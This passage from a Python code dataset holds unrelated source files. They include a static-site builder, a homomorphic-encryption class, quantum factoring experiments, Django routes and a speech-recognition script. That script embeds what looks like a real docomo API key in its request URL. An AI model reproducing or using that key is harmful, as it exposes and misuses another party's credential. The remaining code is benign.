range(len(_filter)):\n for each in temp:\n if fnmatch.fnmatch(each, _filter[i]): # allow glob pattern matching\n feedout = _build(each, render(os.path.join(basedir, each)))\n for j in range(len(ignore)):\n for eachdir in dirsOnly:\n abs_eachdir = os.path.join(basedir, eachdir)\n if os.path.isdir(abs_eachdir) and not fnmatch.fnmatch(abs_eachdir, ignore[j]): # allow glob pattern matching\n get_all_files(os.path.join(basedir, eachdir), ignore, _filter) # recurse\n del allfiles, temp # insignificant though\n\ndef _build(filename, response):\n global Indexer, _mode\n if response is None:\n return\n if _mode == Mode.DIR_MODE:\n Indexer = response['INDEXER']\n fileo = nfc = None\n dest = cLayoutFrame = genHTMLFile = None\n cMainFrame = response['PAGE']\n if response['LAYOUT_FILE'] is not None:\n cLayoutFrame = render(response['LAYOUT_FILE'], Mode.LAYOUT_MODE)\n dest = response['DEST']\n specific = response['UNIQUE']\n specific['PATH_PREFIX'] = response['PATH_PREFIX']\n fname = re.sub(_ptrns[0], ext, filename)\n if not should_return and dest is not None:\n genHTMLFile = os.path.join(workshop, dest, fname)\n if cLayoutFrame is not None:\n tab = re.search(_ptrns[1], cLayoutFrame).group(1) # query the current tab order\n cMainFrame = _doTabs(cMainFrame, tab) # pad tabs according to tab order\n nfc = re.sub(_ptrns[2], cMainFrame, cLayoutFrame) # layout body\n nfc = re.sub(_ptrns[3], specific[\"title\"], nfc) # page title\n nfc = specifics(nfc, specific) # all deferred variables\n else:\n nfc = cMainFrame\n if should_return or not genHTMLFile:\n return nfc\n try:\n fileo = open(genHTMLFile, 'w')\n fileo.write(nfc)\n except IOError:\n console.error(\"could not open file '{}'\".format(genHTMLFile))\n finally:\n if fileo is not None: # open() may have failed before fileo was bound\n fileo.close()\n check = re.search(_ptrns[4], nfc)\n if check is None:\n console.success(status[1])\n sys.stdout.flush()\n else:\n console.error(status[0])\n return 0\n\ndef _doTabs(context=nullstr, tab=nullstr):\n codeframe = False\n lctx = context.split(n)\n nctx = r''\n for each in lctx:\n check = each.lstrip().rstrip()\n # the tag literals below are assumed; the originals were stripped from this copy\n codecheck = check.startswith(\"<pre\") or check.endswith(\"<pre>\")\n ncodecheck = check.startswith(\"</pre\") or check.endswith(\"</pre>\")\n if ncodecheck:\n codeframe = False\n if not codeframe:\n nctx += \"%s%s\\n\"%(tab,each)\n else:\n nctx += \"%s\\n\"%(each)\n if codecheck:\n codeframe = True\n return nctx.rstrip()\n\ndef _metas(x, c):\n if type(x) is str:\n yield re.sub(_ptrns[6]%(r\".+?\"), x, c)\n return\n for key, value in x.items():\n if not value:\n yield nullstr\n return\n c = re.sub(_ptrns[6]%key, value, c)\n yield c\n\ndef hammer(workspace=os.path.dirname(\n os.path.abspath(__file__)), watch=False,\n verbose=False, ret=False):\n global basespace, feedout, should_return\n global framerc, confile, Indexer\n if ret and watch:\n console.error(\"you can't watch while expecting a return value\")\n sys.exit(1)\n if not os.path.exists(workspace):\n console.error('the specified path could not be found')\n sys.exit(3)\n import json\n default_conf = \"\"\"{\n \"ignore\":[\"*.sledge/\"],\n \"filter\":[\"*.frame\"],\n \"dest\": {\n \"path\": \"../../build\",\n \"rel_to_pages_root\": true\n }\n }\"\"\"\n framerc.update(json.loads(default_conf))\n\n should_return = ret\n if os.path.isfile(workspace):\n basespace = os.path.dirname(workspace)\n feedout = _build(os.path.basename(workspace), render(workspace, mode=Mode.FILE_MODE))\n return\n basespace = workspace\n\n \n confile = os.path.join(workspace, confile)\n confile = open(confile).read() if os.path.exists(confile) else default_conf\n framerc.update(json.loads(confile))\n\n ignore = 
framerc['ignore']\n _filter = framerc['filter']\n\n get_all_files(workspace, ignore, _filter)\n\n if watch:\n import watchdog.observers\n from .utils import vigilante\n\n class callbacks:\n def __init__(self):\n pass\n @staticmethod\n def build(filename, response):\n return _build(filename, response)\n @staticmethod\n def renderer(src, mode):\n return render(src, mode)\n\n handler = vigilante.Vigilante(_filter, ignore, Indexer, callbacks, Mode)\n path_to_watch = os.path.normpath(os.path.join(workspace, '..'))\n ob = watchdog.observers.Observer()\n ob.schedule(handler, path=path_to_watch, recursive=True)\n ob.start()\n import time\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n ob.stop()\n Indexer.close()\n #sys.exit(1)\n ob.join()\n\ndef get_build_output():\n \"\"\" returns the output of the build as text instead of writing out to file\n after calling `sledge.hammer(..., ret=True)`\n then `my_page = sledge.get_build_output()`\"\"\"\n return feedout\n","sub_path":"scripts/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"546010503","text":"# -- coding: utf-8 --\nimport os\nimport unittest\n#存放报告的位置\nreport_dir='./test_report'\n\nclass readLastestRp():\n def Latest_Report(report_dir):\n #os.listdir()方法用于返回指定文件夹包含文件或文件名字列表\n lists=os.listdir(report_dir)\n #按照时间顺序对该目录文件夹下面的文件进行排序\n lists.sort(key=lambda fn:os.path.getatime(report_dir+'\\\\'+fn))\n file=os.path.join(report_dir,lists[-1])\n print(\"\\033[1;33;0mreturn new file is%r\\033[0m\"%file)\n return file\n","sub_path":"testCase/model/readLastestRp.py","file_name":"readLastestRp.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"540764165","text":"from playground.EIVHE.math_helper import *\n\n# This is the encryption class with optimizations\nfrom playground.EIVHE.operations import *\n\n\nclass Encryption:\n\n def __init__(self, encryption_core, w, scale, t_bound, input_range):\n self.encryption_core = encryption_core\n self.w = w\n self.scale = np.int64(scale)\n self.t_bound = t_bound\n self.input_range = input_range\n self.t_cache = self.load_t_cache()\n self.s_cache = self.load_s_cache()\n\n # Note that here, t is always with 1 row. hence I is always 1 for S' = [I, T].\n # Cipher is always one dimension higher than plain text\n def load_t_cache(self):\n t_cache = [generate_random_matrix(x, 1, self.t_bound) for x in range(self.w)]\n return t_cache\n\n # Secret is always of the size (plaintext + 1)\n def load_s_cache(self):\n s_cache = [self.encryption_core.key_switching_get_secret(t) for t in self.t_cache]\n return s_cache\n\n def get_t(self, size):\n if size >= self.input_range:\n raise ValueError(\"size {} exceeded input range {}\".format(size, self.input_range))\n else:\n return self.t_cache[size]\n\n def get_s(self, size):\n if size >= self.input_range:\n raise ValueError(\"size {} exceeded input range {}\".format(size, self.input_range))\n else:\n return self.s_cache[size]\n\n def encrypt_vector(self, vector):\n vector = np.multiply(np.array(vector), self.scale).round().astype(np.int64)\n s0 = self.encryption_core.naive_encrypt_secret(self.w, vector.size)\n c0 = vector\n t1 = self.get_t(vector.size)\n c1 = self.encryption_core.key_switching_get_cipher(c0, s0, t1)\n return c1\n\n def decrypt_vector(self, cipher):\n secret = self.get_s(len(cipher) - 1)\n result = self.encryption_core.decrypt(secret, cipher, self.w)\n return np.array(result / np.float64(self.scale))\n\n # Do not need to scale because it is calling encrypt vector\n def encrypt_number(self, number):\n x = np.array([number])\n cipher = self.encrypt_vector(x)\n return cipher\n\n def decrypt_number(self, cipher):\n result = self.encryption_core.decrypt(self.get_s(1), cipher, self.w)\n return result / np.float64(self.scale)\n\n # Encode each row of the matrix\n def encrypt_matrix(self, matrix):\n matrix = np.multiply(np.matrix(matrix), self.scale).round().astype(np.int64)\n column_size = matrix.shape[1]\n s0 = self.encryption_core.naive_encrypt_secret(self.w, column_size)\n t1 = self.get_t(column_size)\n encrypted_matrix = np.matrix([\n self.encryption_core.key_switching_get_cipher(np.array(x).reshape(-1), s0, t1)\n for x in matrix\n ])\n return encrypted_matrix\n\n def decrypt_matrix(self, cipher):\n result = self.encryption_core.decrypt(self.get_s(cipher.shape[1] - 1), cipher, self.w)\n return np.matrix(result / np.float64(self.scale))\n\n @staticmethod\n def add(cipher1, cipher2):\n assert (cipher1.shape == cipher2.shape)\n return np.add(np.array(cipher1), np.array(cipher2))\n\n @staticmethod\n def subtract(cipher1, cipher2):\n assert (cipher1.shape == cipher2.shape)\n return np.subtract(np.array(cipher1), np.array(cipher2))\n\n # Be very careful here, calling round will lose precision in multiply\n @staticmethod\n def multiply_scalar(cipher, number):\n return np.array(np.multiply(cipher, np.float64(number))).round().astype(np.int64)\n\n # Be very careful here, calling round will lose precision in divide\n @staticmethod\n def divide_scalar(cipher, number):\n return np.array(np.divide(cipher, np.float64(number))).round().astype(np.int64)\n\n def weighted_inner_product(self, cipher1, h, cipher2):\n # On Client, note that result always 
has dimension 1.\n secret1 = self.get_s(len(cipher1) - 1)\n secret2 = self.get_s(len(cipher2) - 1)\n m = secure_inner_product_client(self.encryption_core, secret1, secret2, h, self.get_t(1))\n # On Server\n cipher = secure_inner_product_server(self.encryption_core, cipher1, cipher2, m, self.w)\n return self.divide_scalar(cipher, self.scale)\n\n def linear_transform(self, g, cipher):\n # On Client\n gt = self.get_t(g.shape[0])\n gs = self.encryption_core.key_switching_get_secret(gt)\n input_secret = self.get_s(len(cipher) - 1)\n m = secure_linear_transform_client(self.encryption_core, g, input_secret, gt)\n # On Server\n gt_cipher = secure_linear_transform_server(self.encryption_core, cipher, m)\n # Perform key switching again to switch back to keys in get_t\n t = self.get_t(g.shape[0])\n cipher = self.encryption_core.key_switching_get_cipher(gt_cipher, gs, t)\n return cipher\n\n @staticmethod\n def one_hot_transform(number_cipher, total_elements, element_index):\n result = np.append(np.zeros(element_index), number_cipher)\n result = np.append(result, np.zeros(total_elements - element_index - 1))\n return result\n\n def transpose(self, encrypted_matrix):\n encrypted_matrix = np.array(encrypted_matrix)\n n_rows = encrypted_matrix.shape[0]\n n_cols = encrypted_matrix.shape[1] - 1\n eye_n_cols = np.eye(n_cols)\n encrypted_eye_n_cols = np.array(self.encrypt_matrix(eye_n_cols))\n transpose = []\n for col in range(n_cols):\n new_row_after_transpose = np.zeros(n_rows + 1)\n encrypted_one_hot_n_col = encrypted_eye_n_cols[col]\n for row in range(n_rows):\n cipher_scalar = self.weighted_inner_product(encrypted_matrix[row], eye_n_cols, encrypted_one_hot_n_col)\n new_row_after_transpose += self.one_hot_transform(cipher_scalar, n_rows, row)\n transpose.append(new_row_after_transpose)\n return np.array(transpose)\n\n # 1. + x + x*x/2. 
+ x*x*x/6.\n # Note: losing precision here\n def exponential(self, x):\n one = self.encrypt_number(1)\n x_power_2 = self.weighted_inner_product(x, np.eye(1), x)\n x_power_3 = self.weighted_inner_product(x_power_2, np.eye(1), x)\n result = one\n result = self.add(result, x)\n result = self.add(result, self.divide_scalar(x_power_2, 2))\n result = self.add(result, self.divide_scalar(x_power_3, 6))\n return result\n\n def cipher_list_to_cipher_vector(self, cipher_list):\n number_of_elements = len(cipher_list)\n eye = np.array(np.eye(number_of_elements))\n result = np.zeros(number_of_elements + 1)\n for i in range(number_of_elements):\n result += self.one_hot_transform(cipher_list[i], number_of_elements, i)\n return result\n\n def exponential_vector(self, vector):\n number_of_elements = vector.size - 1\n eye = np.array(np.eye(number_of_elements))\n cipher_list = []\n eye_encrypted = np.array(self.encrypt_matrix(eye))\n for i in range(number_of_elements):\n cipher_scalar = self.weighted_inner_product(vector, eye, eye_encrypted[i])\n cipher_exponential = self.exponential(cipher_scalar)\n cipher_list.append(cipher_exponential)\n return self.cipher_list_to_cipher_vector(cipher_list)\n\n # Note: losing precision here\n def softmax(self, vector):\n number_of_elements = vector.size - 1\n eye = np.array(np.eye(number_of_elements))\n result = np.zeros(number_of_elements + 1)\n exponential_sum = np.zeros(2)\n eye_encrypted = np.array(self.encrypt_matrix(eye))\n for i in range(number_of_elements):\n cipher_scalar = self.weighted_inner_product(vector, eye, eye_encrypted[i])\n cipher_exponential = self.exponential(cipher_scalar)\n result += self.one_hot_transform(cipher_exponential, number_of_elements, i)\n exponential_sum += cipher_exponential\n\n one = self.encrypt_number(1)\n scale = np.sum(exponential_sum) / np.sum(one)\n return self.divide_scalar(result, scale)\n\n def outer_product(self, cipher1, cipher2):\n cipher1 = np.array(cipher1)\n cipher2 = np.array(cipher2)\n eye = np.eye(cipher1.shape[1] - 1)\n cipher2_transpose = np.array(self.transpose(cipher2))\n element_result = [[self.weighted_inner_product(cipher1_row, eye, cipher2_row)\n for cipher2_row in cipher2_transpose] for cipher1_row in cipher1]\n result = [self.cipher_list_to_cipher_vector(element_row) for element_row in element_result]\n return np.array(result)\n\n def sum(self, vector_cipher):\n number_of_elements = len(vector_cipher) - 1\n ones = self.encrypt_vector(np.ones(number_of_elements))\n return self.weighted_inner_product(vector_cipher, np.eye(number_of_elements), ones)\n","sub_path":"playground/EIVHE/encryption.py","file_name":"encryption.py","file_ext":"py","file_size_in_byte":8890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"356400062","text":"from django.conf.urls import url\n\nfrom . import views\n\n\nurlpatterns = [\n url(r'^$', views.product_list, name='product_list'),\n url(r'^beads_necklace/$', views.beads_necklace_view, name='beads_necklace_view'),\n url(r'^other_products/$', views.other_products_view, name='other_products_view'),\n url(r'^(?P[\\w-]+)/$', views.product_view, name='product_view'),\n]\n\n","sub_path":"src/apps/product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"547163921","text":"#!/usr/bin/env python\n# --utf-8--\n\nimport requests\nimport json\nimport pyaudio\nimport sys\nimport time\nimport wave\nimport subprocess\n\nimport jtalk\n\n#解析する音声の録音\ndef rec():\n #各種設定\n chunk = 512\n #APIの規定で16bitに設定\n FORMAT = pyaudio.paInt16\n #モノラル\n CHANNELS = 1\n #サンプリングレート,APIの規定で16kHzに設定\n RATE = 16000\n #録音時間\n RECORD_SECONDS = 3\n\n #pyaudio\n audio = pyaudio.PyAudio()\n #マイク0番を設定\n Mic_index = 0\n #マイクからデータ取得\n stream = audio.open(format = FORMAT,\n channels = CHANNELS,\n rate = RATE,\n input = True,\n input_device_index = Mic_index,\n frames_per_buffer = chunk)\n\n #--録音--\n print ('Recording now...')\n all = []\n for i in range(0, int(RATE / chunk * RECORD_SECONDS)):\n data = stream.read(chunk)\n all.append(data)\n print ('Finised Recording')\n #--録音--\n\n stream.stop_stream()\n stream.close()\n audio.terminate()\n\n out = wave.open('/home/taichi/RosVI/audio/command.wav','wb')\n out.setnchannels(CHANNELS) #mono\n out.setsampwidth(audio.get_sample_size(FORMAT)) #16bits\n out.setframerate(RATE)\n out.writeframes(b''.join(all))\n out.close()\n\n#docomo音声認識APIによる解析\ndef recognize():\n #命令の取得(録音)\n rec()\n #ファイルの場所\n path = '/home/taichi/RosVI/audio/command.wav'\n #docomo音声認識API\n url = \"https://api.apigw.smt.docomo.ne.jp/amiVoice/v1/recognize?APIKEY=593030457255434f45696f61737833635a59665132624a4c363939306279525351565535635864704e622e\"\n wav_file = {\"a\": open(path, 'rb'), \"v\":\"off\"}\n #postしてけっかを取得\n result = requests.post(url, files=wav_file)\n responce = (result.json()['text'])\n\n jtalk.order(responce)\n\nif __name__ == '__main__' :\n print ('これは音声認識モジュールです.importしてください.')\n","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"85790596","text":"\ndef CalcLength(a, b):\n\tlength = 2\n\twhile a - b >= 0:\n\t\ttemp = a - b\n\t\ta = b\n\t\tb = temp\n\t\tlength += 1\n\treturn length\n\nn = int(input())\nmaxLength = 0\nfor i in range(1, n + 1):\n\tlength = CalcLength(n, i)\n\tif length >= maxLength:\n\t\tmaxLength = length\nprint(maxLength)\n","sub_path":"Mchain.py","file_name":"Mchain.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"502834092","text":"from vqf.preprocessing import create_clauses, calculate_number_of_unknowns\nfrom vqf.preprocessing import factor_56153, factor_291311\nfrom vqf.optimization import OptimizationEngine\nfrom sympy import Add, Mul, Symbol\nimport numpy as np\nimport pdb\n\n\ndef run_single_case(p_q_info, optimization_engine):\n sampling_results, mapping, bfgs_evaluations = optimization_engine.perform_qaoa()\n most_frequent_bit_string = max(sampling_results, key=lambda x: sampling_results[x])\n \n squared_overlap = calculate_squared_overlap(mapping, sampling_results, p_q_info)\n\n return squared_overlap, bfgs_evaluations, optimization_engine.step_by_step_results\n\n\ndef calculate_squared_overlap(mapping, sampling_results, p_q_info, verbose=False):\n true_p = p_q_info[0]\n true_q = p_q_info[1]\n p_dict = p_q_info[2]\n q_dict = p_q_info[3]\n\n p_binary_string = bin(true_p)[2:][::-1]\n q_binary_string = bin(true_q)[2:][::-1]\n\n p_binary = [int(char) for char in p_binary_string]\n q_binary = [int(char) for char in q_binary_string]\n if len(p_binary) < len(p_dict):\n trailing_zeros = len(p_dict) - len(p_binary)\n for zero in range(trailing_zeros):\n p_binary.append(0)\n\n if len(q_binary) < len(q_dict):\n trailing_zeros = len(q_dict) - len(q_binary)\n for zero in range(trailing_zeros):\n q_binary.append(0)\n\n all_correct_assignments = []\n correct_assignment = {}\n for q_id, q_val in q_dict.items():\n if type(q_val) is Symbol:\n bit_id = mapping[str(q_val)]\n correct_value = q_binary[q_id]\n if bit_id not in correct_assignment.keys():\n correct_assignment[bit_id] = correct_value\n\n for p_id, p_val in p_dict.items():\n if type(p_val) is Symbol:\n bit_id = mapping[str(p_val)]\n correct_value = p_binary[p_id]\n if bit_id not in correct_assignment.keys():\n correct_assignment[bit_id] = correct_value\n\n all_correct_assignments.append(correct_assignment)\n # TODO: \n # This is just a hack for 56153 and 291311 to work properly.\n # It should be generalized to work for any symmetric case.\n\n if (true_p == 241 and true_q == 233):\n assignment_1 = {mapping['p_3']: 0, mapping['p_4']: 1, mapping['q_3']: 1, mapping['q_4']: 0}\n assignment_2 = {mapping['p_3']: 1, mapping['p_4']: 0, mapping['q_3']: 0, mapping['q_4']: 1}\n all_correct_assignments = [assignment_1, assignment_2]\n\n if (true_p == 557 and true_q == 523):\n assignment_1 = {mapping['p_1']: 0, mapping['p_2']: 1, mapping['p_5']: 1, mapping['q_1']: 1, mapping['q_2']: 0, mapping['q_5']: 0}\n assignment_2 = {mapping['p_1']: 1, mapping['p_2']: 0, mapping['p_5']: 0, mapping['q_1']: 0, mapping['q_2']: 1, mapping['q_5']: 1}\n all_correct_assignments = [assignment_1, assignment_2]\n\n\n total_overlap = 0\n total_count = 0\n if verbose:\n print(all_correct_assignments)\n print(mapping)\n squared_overlap = 0\n for correct_assignment in all_correct_assignments:\n for bit_string, count in sampling_results.most_common():\n correct_count = 0\n for bit_id, bit_value in enumerate(bit_string):\n # This accounts for the fact some of the bits of the sampling results\n # are irrelevant to the result - namely, carry bits.\n if bit_id not in correct_assignment.keys():\n continue\n if bit_value == correct_assignment[bit_id]:\n correct_count += 1\n overlap = (correct_count / len(correct_assignment))**2 * count\n total_count += count\n if verbose:\n print(bit_string, count, correct_count, overlap)\n total_overlap += overlap\n if verbose:\n print(\"_\"*10)\n total_overlap = total_overlap / total_count\n squared_overlap += total_overlap\n return 
squared_overlap\n\n\ndef main():\n results = []\n # p_q_m_list = [[283, 7, 1981], [29, 11, 319], [263, 263, 69169], [263, 11, 2893], [241, 233, 56153], [557, 523, 291311]]\n # grid_sizes = [6, 24, 36, 9, 12, 24]\n # unknowns_list = [[2, 0], [6, 3], [8, 5], [3, 1], [4, 0], [6, 0]]\n p_q_m_list = [[283, 7, 1981], [263, 11, 2893], [241, 233, 56153], [557, 523, 291311], [29, 11, 319], [263, 263, 69169]]\n grid_sizes = [6, 9, 12, 24, 24, 36]\n unknowns_list = [[2, 0], [3, 1], [4, 0], [6, 0], [6, 3], [8, 5]]\n for p_q_m, grid_size, unknowns in zip(p_q_m_list, grid_sizes, unknowns_list):\n true_p = p_q_m[0]\n true_q = p_q_m[1]\n m = p_q_m[2]\n apply_preprocessing = True\n preprocessing_verbose = False\n optimization_verbose = False\n if m != 319 and m != 69169:\n continue\n number_of_unknowns = 0\n carry_bits = 0\n counter = 0\n if m == 56153:\n p_dict, q_dict, z_dict, clauses = factor_56153()\n elif m == 291311:\n p_dict, q_dict, z_dict, clauses = factor_291311()\n else:\n p_dict, q_dict, z_dict, clauses = create_clauses(m, true_p, true_q, apply_preprocessing, preprocessing_verbose)\n number_of_unknowns, carry_bits = calculate_number_of_unknowns(p_dict, q_dict, z_dict)\n\n if number_of_unknowns != unknowns[0] or carry_bits != unknowns[1]:\n print(\"Got wrong number of unknowns!\")\n continue\n\n p_q_info = [true_p, true_q, p_dict, q_dict]\n step_by_step_results = None\n for steps in range(1, 9):\n for i in range(1):\n print(m, steps, i) \n # optimization_engine = OptimizationEngine(clauses, steps=steps, grid_size=grid_size, tol=1e-10, gate_noise=1e-3, verbose=optimization_verbose, visualize=False)\n optimization_engine = OptimizationEngine(clauses, steps=steps, grid_size=grid_size, tol=1e-10, gate_noise=None, verbose=optimization_verbose, visualize=False)\n optimization_engine.step_by_step_results = step_by_step_results\n squared_overlap, bfgs_evaluations, step_by_step_results = run_single_case(p_q_info, optimization_engine)\n \n print(squared_overlap)\n results.append([m, steps, squared_overlap, bfgs_evaluations])\n\n # optimization_history = optimization_engine.optimization_history\n # history_file_name = \"_\".join([str(m), str(steps), str(i), \"history\"]) + \".csv\"\n # np.savetxt(history_file_name, optimization_history, delimiter=\",\")\n np.savetxt(\"results.csv\", results, delimiter=\",\", header=\"m,steps,squared_overlap,bfgs_evaluations\", fmt='%.4f', comments='')\n\nif __name__ == '__main__':\n main()","sub_path":"research/2019_05_08_performance_checks/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"213469490","text":"\"\"\"\nThe algorithm should run in linear time and in O(1) space.\n\"\"\"\n\n\nclass Solution:\n\n def majorityElement(self, nums: list[int]) -> list[int]:\n \"\"\"\n Boyer-Moore Majority Vote Algorithm:\n 由于最多有两个可能的元素,所以我们使用两个 candidate,每个 candidate 对应一个 counter。\n 先判断当前元素是否与 candidate 相匹配,若不匹配,则判断是否要更新 candidate,若也不需要更新,\n 则已经获取了三个不同的元素,即当前元素和两个 candidate,去除的方式是两个 counter 同时减一。\n 不能类似 Majority Element 那样,使用数组的前两个元素作为两个 candidate,因为数组的前两个元素可能是相同的。\n 其实解决办法也很简单,只要给两个 candidate 赋予不同的初值,并且两个 counter 的初值均为 0 即可。\n 如果先判断 counter,则有可能出现两个 candidate 相同的情况\n :param nums:\n :return:\n \"\"\"\n def validate(nums: list[int], candidate):\n \"\"\"\n 判断candidate元素的个数是否大于len(nums)的1/3\n :param nums:\n :param candidate:\n :return:\n \"\"\"\n count = 0\n for ele in nums:\n if ele == candidate:\n count += 1\n if count > len(nums) // 3:\n return True\n else:\n return False\n res = []\n candidate_1, candidate_2 = 0, 1\n count_1, count_2 = 0, 0\n for element in nums:\n if element == candidate_1:\n count_1 += 1\n elif element == candidate_2:\n count_2 += 1\n elif count_1 == 0:\n candidate_1 = element\n count_1 = 1\n elif count_2 == 0:\n candidate_2 = element\n count_2 = 1\n else:\n count_1 -= 1\n count_2 -= 1\n if validate(nums, candidate_1):\n res.append(candidate_1)\n if validate(nums, candidate_2):\n res.append(candidate_2)\n return res","sub_path":"Medium/MajorityElementII.py","file_name":"MajorityElementII.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"12219702","text":"\"\"\"\nBase classes for use by mocks\n\"\"\"\n\nimport datetime\nfrom enum import Enum\nimport math\nfrom pathlib import Path\nimport re\nfrom typing import List, Union\n\nfrom musicbingo.docgen.colour import Colour\nfrom musicbingo.docgen.sizes import Dimension\nfrom musicbingo.docgen.styles import Padding\nfrom musicbingo.song import Duration\n\nclass MockBase:\n \"\"\"\n Base class used by other mocks\n \"\"\"\n\n #pylint: disable=too-many-branches\n def flatten(self, items, convert_numbers=False):\n \"\"\"Converts an object in to a form suitable for JSON encoding.\n flatten will take a dictionary, list or tuple and inspect each item\n in the object looking for items such as datetime.datetime objects\n that need to be converted to a canonical form before\n they can be processed for storage.\n \"\"\"\n if isinstance(items, dict):\n retval = {}\n else:\n retval = []\n for item in items:\n key = None\n if isinstance(items, dict):\n key = item\n item = items[key]\n if hasattr(item, 'as_dict'):\n item = self.flatten(item.as_dict())\n if isinstance(item, (datetime.datetime, datetime.time)):\n item = self.to_iso_datetime(item)\n elif isinstance(item, (datetime.timedelta)):\n item = self.to_iso_duration(item)\n elif isinstance(item, Colour):\n item = item.css()\n elif isinstance(item, Dimension):\n item = str(item)\n elif isinstance(item, Duration):\n item = int(item)\n elif isinstance(item, Padding):\n item = self.flatten(tuple(item))\n elif isinstance(item, Path):\n item = '/'.join([item.parent.name, item.name])\n elif isinstance(item, Enum):\n item = item.name\n elif convert_numbers and isinstance(item, int):\n item = str(item).replace('l', '')\n elif isinstance(item, str):\n item = item.replace(\"'\", \"\\'\")\n elif isinstance(item, (list, set, tuple)):\n item = self.flatten(list(item))\n elif isinstance(item, dict):\n item = self.flatten(item)\n if callable(item):\n continue\n if key:\n retval[key] = item\n else:\n retval.append(item)\n if items.__class__ == tuple:\n return tuple(retval)\n return retval\n\n @staticmethod\n def to_iso_datetime(value: Union[datetime.datetime, datetime.time]) -> str:\n \"\"\"\n Convert a datetime to an ISO8601 formatted dateTime string.\n :param value: the dateTime to convert\n :returns: an ISO8601 formatted string version of the dateTime\n \"\"\"\n retval = value.isoformat()\n if value.tzinfo is None:\n retval += 'Z'\n else:\n # replace +00:00 timezone with Z\n retval = re.sub('[+-]00:00$', 'Z', retval)\n return retval\n\n @staticmethod\n def to_iso_duration(secs: Union[datetime.timedelta, str, float]) -> str:\n \"\"\"\n Convert a time period to an ISO8601 formatted duration string.\n :param secs: the duration to convert, in seconds\n :returns: an ISO8601 formatted string version of the duration\n \"\"\"\n if isinstance(secs, str):\n secs = float(secs)\n elif isinstance(secs, datetime.timedelta):\n secs = secs.total_seconds()\n hrs = int(math.floor(secs / 3600.0))\n retval: List[str] = ['PT']\n secs %= 3600\n mins = int(math.floor(secs / 60.0))\n secs %= 60\n if hrs:\n retval.append(f'{hrs}H')\n if hrs or mins:\n retval.append(f'{mins}M')\n retval.append('{0:0.2f}S'.format(secs))\n return ''.join(retval)\n","sub_path":"musicbingo/tests/mock_base.py","file_name":"mock_base.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"565455245","text":"#-----------------------------------------------------------------------------\n# Name: IO.py\n# Author: Michael Aughton\n# Created: 6/22/15\n#-----------------------------------------------------------------------------\n\n'''IO Module that is in charge of data request and data response'''\n\nimport socket\nimport logging\nimport struct\nimport sys\nimport copy\nfrom lib.tools import indent\nfrom client.nlu import semanticprocessor\nfrom math import sqrt\n\n\nlogger = logging.getLogger(__name__)\n\nvision_sock = None\nrec_sock = None\nbuffer_size = 8192 # the bytes of received data should not exceed this size\nenabled = True\nenvironment = \"\"\nblocks = []\nvision_enabled = False\nrec_enabled = False\nvision_ip = None\nvision_port = None\n\n\n# color codes\n_colors = {0:\"unknown\",\n 1:\"black\",\n 2:\"blue\",\n 3:\"brown\",\n 4:\"grey\",\n 5:\"green\",\n 6:\"orange\",\n 7:\"pink\",\n 8:\"purple\",\n 9:\"red\",\n 10:\"white\",\n 11:\"yellow\"}\n\n# arrays of block indices corresponding to their respective block colors\ncolors_b = {\"unknown\":[],\n \"black\":[],\n \"blue\":[],\n \"brown\":[],\n \"grey\":[],\n \"green\":[],\n \"orange\":[],\n \"pink\":[],\n \"purple\":[],\n \"red\":[],\n \"white\":[],\n \"yellow\":[]}\n\n# arrays of box indices corresponding to their respective box colors\ncolors_box = {\"unknown\":[],\n \"black\":[],\n \"blue\":[],\n \"brown\":[],\n \"grey\":[],\n \"green\":[],\n \"orange\":[],\n \"pink\":[],\n \"purple\":[],\n \"red\":[],\n \"white\":[],\n \"yellow\":[]}\n\n# approximate rgb values for each color\n_rgb = {\"unknown\":(-1,-1,-1),\n \"black\":(1,0,0),\n \"blue\":(0,0,255),\n \"brown\":(166,42,42),\n \"grey\":(125,125,125),\n \"green\":(0,255,0),\n \"orange\":(255,127,0),\n \"pink\":(188,143,143),\n \"purple\":(128,0,128),\n \"red\":(255,0,0),\n \"white\":(255,255,255),\n \"yellow\":(255,255,0)}\n\nobject_sizes = {\"block1\":[30,30,30],\n \"block2\":[30,60,30],\n \"block3\":[30,60,15],\n \"block4\":[30,90,15],\n \"block5\":[40,82,17],\n \"box\":[135,120,135],\n \"bottle\":[60,200,60],\n \"tallcyl\":[85,160,85],\n \"shortcyl\":[85,80,85]}\n\ndef get_vision_address(ip, port):\n \"\"\"Initializes socket address\"\"\"\n global vision_enabled\n global vision_ip\n global vision_port\n \n if vision_enabled:\n vision_ip = ip\n vision_port = port\n else:\n pass\n\ndef init_connect(module, ip, port):\n \"\"\"Initializes socket connections.\"\"\"\n\n global vision_sock\n global rec_sock\n \n if module == \"vision\":\n try:\n vision_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n vision_sock.connect((ip, port))\n except socket.error:\n logger.error(\"Connection to vision capture server refused\")\n return ''\n elif module == \"rec\":\n try:\n rec_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n rec_sock.connect((ip, port))\n except socket.error:\n logger.error(\"Connection to recipient refused\")\n return '' \n \n\ndef sendEnvRequest(action = None):\n \"\"\"Builds and returns a string of the environment through the network,\n if networking is enabled, or through a test array, if networking is\n disabled.\n \"\"\"\n \n global vision_enabled\n \n if vision_enabled:\n env_str 